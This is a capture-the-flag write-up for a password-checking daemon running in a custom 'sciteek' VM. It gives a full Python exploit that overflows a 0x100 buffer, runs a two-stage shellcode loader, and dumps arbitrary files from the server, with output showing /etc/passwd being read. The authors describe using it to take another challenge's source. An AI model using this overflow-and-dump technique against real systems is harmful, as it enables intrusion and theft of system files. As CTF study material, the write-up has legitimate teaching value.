The daemon on port 4004 is a fairly simple daemon that checks for a password (hard-coded in the binary) and just says “You are authenticated”.
What’s interesting is that this daemon runs on the same server as many other challenges, so we used it to fetch files and solve the URL Shortener challenge more easily by retrieving its Python source.
We have limited space for the shellcode, only 100 bytes. While you can read files with a 100-byte shellcode if you don’t care about error checking, I wanted something cleaner (that’s the excuse for spending time on a multi-stage exploit loader).
This exploit will:
– overflow the buffer (size is 0x100)
– Inject stage 1 loader
– Read Stage 2 from stdin
– Execute Stage 2
– Read filename to dump from stdin
– Open file with error checking
– Dump the file using a read/write loop, so you can dump files bigger than the memory
– Exit
from __future__ import print_function

import socket
import sys
import time
from struct import pack
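# Layout facts taken from the writeup: the loader must fit in the first 100
# bytes of the 0x100 buffer, the saved return address follows immediately and
# is pointed back into the nopsled.  Both shellcode stages target the
# challenge's sciteek VM; the opcode comments follow the writeup's own
# decoding (04 02 rN imm16 = movl, 04 00 rD rS = mov, 18 02 rN imm16 = cmpl,
# 10 rel16 = jz, 16 rel8 = jmps, 19 03 rN = call *rN, 30 = syscall).  Jump
# offsets count from the end of the jump instruction: +57 and +26 both land on
# the final "movl r0, 0x1", and the 0xc7 (-57) short jump lands on "mov r7, r0".
SHELLCODE_SLOT = 100        # bytes available for the loader before the return address
FILENAME_MAX = 0x32         # stage 2 reads at most this many bytes of filename
RETURN_ADDR = b"\x94\x7f"   # saved return address, redirected into the nopsled
NOP = b"\x02"               # one-byte no-op used for the sled
STAGE_DELAY = 2             # seconds to wait between stages (as in the writeup)


def build_stage2():
    """Return the stage-2 shellcode as bytes.

    It reads a NUL-terminated filename from stdin into 0x7b94, opens it,
    copies the file to stdout in 0xff-byte chunks through the buffer at
    0x1000, and exits; an open() failure (r0 == 0xffff) jumps straight to
    exit.  The bytes are exactly those of the writeup; only the comments
    were re-checked against the encoding.
    """
    return b"".join([
        b"\x04\x02\x01\x00\x00",  # movl r1, 0x0      fd = stdin
        b"\x04\x02\x00\x03\x00",  # movl r0, 0x3      syscall number: read
        b"\x04\x02\x02\x94\x7a",  # movl r2, 0x7b94   filename buffer
        b"\x04\x02\x03\x32\x00",  # movl r3, 0x32     max filename length
        b"\x30",                  # syscall (read)
        b"\x04\x02\x00\x02\x00",  # movl r0, 0x2      syscall number: open
        b"\x04\x02\x01\x94\x7a",  # movl r1, 0x7b94   path
        b"\x04\x02\x02\x00\x00",  # movl r2, 0x0
        b"\x04\x00\x03\x02",      # mov r3, r2
        b"\x30",                  # syscall (open)
        b"\x18\x02\x00\xff\xff",  # cmpl r0, 0xffff   open failed?
        b"\x10\x39\x00",          # jz +57            -> exit
        b"\x04\x00\x07\x00",      # mov r7, r0        save fd (loop target)
        b"\x04\x00\x01\x00",      # mov r1, r0        fd
        b"\x04\x02\x00\x03\x00",  # movl r0, 0x3      syscall number: read
        b"\x04\x02\x02\x00\x10",  # movl r2, 0x1000   data buffer
        b"\x04\x02\x03\xff\x00",  # movl r3, 0xff     chunk size (the writeup comment said 0x32; the byte is 0xff)
        b"\x30",                  # syscall (read)
        b"\x18\x01\x00\x00",      # cmpl r0, 0x0      EOF?
        b"\x10\x1a\x00",          # jz +26            -> exit
        b"\x04\x00\x03\x00",      # mov r3, r0        bytes read
        b"\x04\x02\x00\x04\x00",  # movl r0, 0x4      syscall number: write
        b"\x04\x02\x01\x01\x00",  # movl r1, 0x1      fd = stdout
        b"\x04\x02\x02\x00\x10",  # movl r2, 0x1000   data buffer
        b"\x30",                  # syscall (write)
        b"\x04\x00\x00\x07",      # mov r0, r7        restore fd
        b"\x16\xc7",              # jmps -57          back to "mov r7, r0" (0xc7 is -57, not -47 as the writeup said)
        b"\x04\x02\x00\x01\x00",  # movl r0, 0x1      syscall number: exit
        b"\x30",                  # syscall (exit)
    ])


def build_loader(stage2):
    """Return the stage-1 loader for *stage2* (bytes).

    The loader reads exactly len(stage2) bytes from stdin to 0x6000 and calls
    that address.  struct.error is raised if the length does not fit in 16 bits.
    """
    return b"".join([
        b"\x04\x02\x01\x00\x00",             # movl r1, 0x0      fd = stdin
        b"\x04\x02\x00\x03\x00",             # movl r0, 0x3      syscall number: read
        b"\x04\x02\x02\x00\x60",             # movl r2, 0x6000   destination
        b"\x04\x02\x03" + pack("<H", len(stage2)),  # movl r3, len(stage2)
        b"\x30",                             # syscall (read)
        b"\x04\x02\x00\x00\x60",             # movl r0, 0x6000   (register byte is r0, which call below uses; the writeup comment said r2)
        b"\x19\x03\x00",                     # call *r0
    ])


def build_payload(loader):
    """Pad *loader* to the 100-byte slot with a nopsled and append the return address.

    Raises ValueError when the loader does not fit in the slot.
    """
    if len(loader) > SHELLCODE_SLOT:
        raise ValueError("Shellcode too long: %d" % len(loader))
    sled = NOP * (SHELLCODE_SLOT - len(loader))
    return sled + loader + RETURN_ADDR


def main(argv=None):
    """Run the three-stage exchange against host/port and stream the dumped file to stdout.

    Returns the process exit status (0 on success, 1 on a usage or size error).
    Status lines go to stdout as in the original script; the dumped bytes are
    written unmodified, without the extra newline per chunk that print() added.
    """
    if argv is None:
        argv = sys.argv
    if len(argv) != 4:
        print('\nUsage:\t./sciteek4004.py [host] [port] [filename]')
        return 1
    host = argv[1]
    port = int(argv[2])
    filename = argv[3]
    if not isinstance(filename, bytes):  # Python 3 argv is text; Python 2 str is already bytes
        filename = filename.encode("utf-8")
    # Stage 2 reads FILENAME_MAX bytes; the NUL terminator must be among them
    # or the filename would presumably be truncated on the VM side.
    if len(filename) + 1 > FILENAME_MAX:
        print("\nFilename too long: ", len(filename), "bytes, max", FILENAME_MAX - 1, "\n")
        return 1

    sock = socket.create_connection((host, port))
    try:
        banner = sock.recv(65536)
        print('Received', repr(banner))

        stage2 = build_stage2()
        loader = build_loader(stage2)
        try:
            payload = build_payload(loader)
        except ValueError as err:
            print("\n%s\n" % err)
            return 1
        print("Shellcode size: ", len(loader), "\n")
        print("Nopsled size: ", SHELLCODE_SLOT - len(loader), "\n")
        print("Payload size: ", len(payload), "\n")

        # sendall: send() may deliver only part of a buffer on a stream socket.
        # Stage 1: overflow the buffer, return into the nopsled, run the loader.
        sock.sendall(payload)
        time.sleep(STAGE_DELAY)  # presumably lets the loader's read() consume stage 1 first
        # Stage 2: consumed by the loader's read(0, 0x6000, len(stage2)).
        sock.sendall(stage2)
        time.sleep(STAGE_DELAY)
        # Filename: NUL-terminated so open() sees the end of the string.
        sock.sendall(filename + b"\x00\n")

        out = getattr(sys.stdout, "buffer", sys.stdout)  # raw bytes on Python 3
        while True:
            chunk = sock.recv(65536)
            if not chunk:
                break
            out.write(chunk)  # not print(): that inserted a newline per chunk into the dump
        out.flush()
    finally:
        sock.close()
    return 0


if __name__ == "__main__":
    sys.exit(main())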
Result:
$ python sciteek4004.py sciteek.nuitduhack.com 4004 "/etc/passwd"
Received 'Password (required): '
Shellcode size: 29
Nopsled size: 71
Payload size: 102
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spo
ol/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin